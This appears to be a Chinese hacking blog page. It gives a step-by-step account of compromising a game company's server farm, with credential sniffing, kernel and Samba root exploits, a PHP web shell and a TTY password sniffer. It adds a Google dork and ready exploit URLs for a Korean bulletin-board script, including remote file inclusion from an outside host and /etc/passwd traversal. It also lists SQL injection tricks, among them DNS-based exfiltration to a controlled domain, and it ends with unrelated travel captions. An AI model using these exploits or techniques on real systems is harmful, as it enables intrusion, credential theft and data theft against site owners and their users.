4C00H'blog

没什么技术性,只是想说明现状  

现在想弄钱的入侵者，似乎热衷于入侵网络游戏服务器，盗出游戏服务器程序或是数据库。国内的网络游戏企业，都应该招受过此损失，有暴露出来的，有没暴露出来的。但游戏企业对安全问题理解都十分片面，狭隘!  

　当然，不只是网络游戏企业。近一两年来，入侵者乐此不疲，各种商业数据的偷盗在国内几乎快形成一种"圈内产业"。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似乎有着完美结合。再看看各地公安网监部门，媒体似乎每天都有报道关于某地公安抓获某黑客的事件。但却似乎没有一起真正成熟的案件。抓到的都是小鱼，大鱼都在偷着乐。原因有没发现没报案的，也有网监部门的技术问题。还有就是官僚主义，公安部门发布所谓的“战果”也乐此不疲。  

　话不说远了，转入正题。  

　一个好友在国内某网络游戏企业工作，让我帮忙测试他们游戏服务器群的安全性。加上我这段时间闲得无聊，也就答应了。  

　我先下载了游戏客户端程序，得到到了几个游戏服务器的地址。  
　游戏帐号在WEB网站上也可以注册，看来游戏中央数据库的调用WEB网站也可以。  
　先仔细的检查了一下WEB网站，大部分是PHP+MYSQL的。代码写得还不错，几乎找不到什么突破口。再看看MYSQL，禁止远程连接。查看了其他游戏服务器，都是LINUX系统，都只是开了OPENSSH和游戏服务器程序端口。只有WEB网站多个80，而又没什么可利用的地方。  

　　看上去安全做得不错，但这是种幻象！  

　　随后仔细分析了下游戏客户端程序，我打开SnifferPro以便记录下客户端程序和服务器的所有通信。发现客户端程序有个自动更新功能，我Sniff到是通过FTP去下载更新文件的。但我扫描所有游戏服务器时没发现这个FTP端口啊（8888）。仔细看了一下，原来这个端口连接延时十分长。所以扫描器没发现这个端口。  

　　　意外的从更新过程中，竟然Sniff到一个固定的更新程序的FTP帐户。检查了FTP服务器是ProFTPd，我没直接用这个帐户去溢出ProFtpd。因为这台服务器开了SSH，我直接拿帐户去登陆SSH，获得一个权限极低的shell。  

就像一块布，一但撕开一丁点口子，只要稍一加力，整块布都会随之撕开!  

在系统中寻觅了半天，终于寻找到一个有权限去写的tmp目录。查看了内核版本，用kernel do_brk()的问题溢出提升权限获得了rootshell，没去装rkt，因为只是帮忙测试.  

检查了系统的路由表，发现有一个内网，最后确认是VPN，原来所有游戏服务器之间的连接是通过VPN，防火墙的信任检查，都是通过内网的IP地址。外网访问这些服务器都只能看到22端口和游戏服务程序端口。  

在这台已控制的服务器上下载了一个nmap，扫描了其他服务器，发现其中一台开了Samba,查看了一下版本，存在问题。溢出并获得了rootshell。  

到现在为止以控制两台服务器，我把两台服务器的shadow文件都弄回来，拿jonh跑了一遍，没什么弱智密码。看来密码还设得挺好的。  

逛尤了一会，在开了Samba的服务器上，发现了游戏服务器程序。并随之在game.conf文件中发现了中央数据库的地址和一个数据库帐户。登上去看了一下，数据库太庞大，放弃了dump出来的念头。  

　好象没有必要去分析游戏服务器程序，找出vul，去exp，来撕开其他服务器  

　但从其中的一个名为"weihu"的table中，发现一个后台管理帐户和密码，这个密码大小写互换加数字加符号。  

　我在web网站上找到一个后台入口，并用在数据库得到的帐户登陆成功。发现后台管理系统中有一个上传的功能，而且没检查文件后缀名。存放文件目录也是在web目录之下。上传了一个phpshell,执行命令成功，随后我又获得提升权限为root的shell。  

　发现这台机器上还有个root在上面工作，但正在专注用vi编辑一个文件。没发现我。但我想到一个恶作剧。我给这台web网站服务器装了个能监视tty输入的sniff，随后又skill了那个root，那个root被踢下去没多久，又登陆上来。但我立马就抓到了他的密码。  

　我用这个抓到的密码去登陆其他服务器的SSH，并也用root帐户，都登陆成功。  

　感觉所有服务器的系统都应该是直接拷的盘，因为系统版本和所安装的程序和一些配置大都相同。  

　至此已经控制游戏服务器群的所有服务器，其中还有一台是SMS网关。  

　我们的游戏时间结束。只是因为一个小问题，最后导致整个服务器群被控制，其实这在安全问题上，这是必然会发生的。安全无小事!  

　其实这家企业对安全也有投入，硬件防火墙，支持VPN的。但因为一个程序自动更新的设计上的小失败。导致一切都虚设。  

　随后我把整个过程告诉了我那朋友，听得他立马向他们主管汇报了问题。  


　如有其他游戏企业被入侵，雷同文章所说，那纯属巧合，本人概不负责!

拿韩国站的时候，要关注一下这个东东

Google Dork: inurl:bbs_sun/board.php

board.php文件内容如下:

————————–
<?
if(!$admin) $pgUp .= “../”;
else if($admin==’N') $pgUp .= “”;

include $pgUp.”inc/dbconn.php”;
include $pgUp.”bbs_sun/config.php”;
?>

<link href=”<?=$skinSrc?>/style.css” rel=”stylesheet” type=”text/css”>
<?
if($mode == “list”) include ($skinSrc.”/list.php”);
else if($mode == “write” || $mode == “modify” || $mode == “reply”) include ($skinSrc.”/write.php”);
else if($mode == “view”) include ($skinSrc.”/view.php”);
else if($mode == “delete” || $mode == “ment_delete”) include ($skinSrc.”/delete.php”);
?>
————————–

此处存在远程文件包含漏洞

EXP:

http://xxxx.kr/bbs_sun/board.php?admin=0×50sec.org&pgUp=http://www.0×50sec.org/evil.txt?

board.php?admin=0×50sec.org&pgUp=http://www.0×50sec.org/evil.txt?&skinSrc=http://www.0×50sec.org/cmd.txt?&cmd=id&mode=view

有的含有download.php文件，对file变量和bname变量都没有进行必要的检查，导致文件泄漏漏洞:

EXP:

http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&bname=../

mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞

mode=view&number=

mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过，从而可以发布文章和上传文件。

打开一条记录，将mode=view直接改为write就可以上传了。

可能还存在其他的问题比如文件删除等，懒得看了。

很多技巧从国外的paper学到的，不过国内没有多少人使用，所以发出来，笔记下~一、order by 的参数注入技巧：两种方法，思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法：1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));返回错误：[Err] 1242 – Subquery returns more than 1 row2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));返回正常。b.国外paper看到的方法：1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;返回错误：[Err] 1242 – Subquery returns more than 1 row2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;返回正常。二、limit 的参数注入技巧：a.order by之后的limit参数 的注入，因为正常的sql语句order by后无法接union，所以没有好办法，就一个鸡肋思路：into outfile ‘/www/root/xxx.php’;b.limit前无order by时的注入，那就方便多了，后面可以直接接union select ，随便怎么注都行了：select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7这里还有个技巧，使用procedure analyse可以获取字段名称：select * from cdb_members where uid=1 limit 1,1 procedure analyse()不过procedure analyse同样不能使用在order by之后：[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()[Err] 1386 – Can’t use ORDER clause with this procedure三、无法猜测字段时的技巧：在mysql5以下版本或者information_schema 无法访问的时候，无法猜到某个表的字段名，于是可以采用这个办法，在子查询中使用%0，报错获得列名。以ucenter的uc_members为例。1.猜测列数：SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)返回错误：#1241 – Operand should contain 12 column(s)2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)返回正常。3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)返回错误：#1048 – Column ‘uid’ cannot be null4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)返回错误：#1048 – Column ‘username’ cannot be null5. ……注：5.1以上版本不适用，字段必须为非空（not null）四、windows下利用dns解析盲注的技巧：如果盲注很累，或者页面无论and 1=1还是and 1=2的时候返回都一模一样，这个时候利用dns进行注入是个不错的方法，前提是win环境root权限下的mysql，利用load_file函数读取远程文件的思路。本地搭建一个dns服务器，然后将特定域名的NS server转过来。然后进行注入，并抓包。本地测试了下（实际注入中单引号可以编码）：select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’))，抓包成功获得select的结果：29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost

测试

特征码定位原理

» 阅读全文

.arch 最初的构建信息

.bss 未经初始化的数据

.crt C运行期只读数据

.data 已经初始化的数据

.debug 调试信息

.didata 延迟输入文件名表

.edata 导出文件名表

.idata 导入文件名表

.pdata 导常信息

.rdata 只读的初始化数据

.reloc 重定位表信息

.rsrc 资源

.text .exe或.dll文件的可执行代码

.tls 线程的本地存储器

为了一个项目,我碾转了四个城市

福州至温州动车组上某黑

动车上的长腿列车MM

X庭大酒店房间内无聊的和某2B的渗透工作

看完三国再工作

X市机场拉一下TX背影

飞机上无聊的新闻

吃点点心!

到达省会!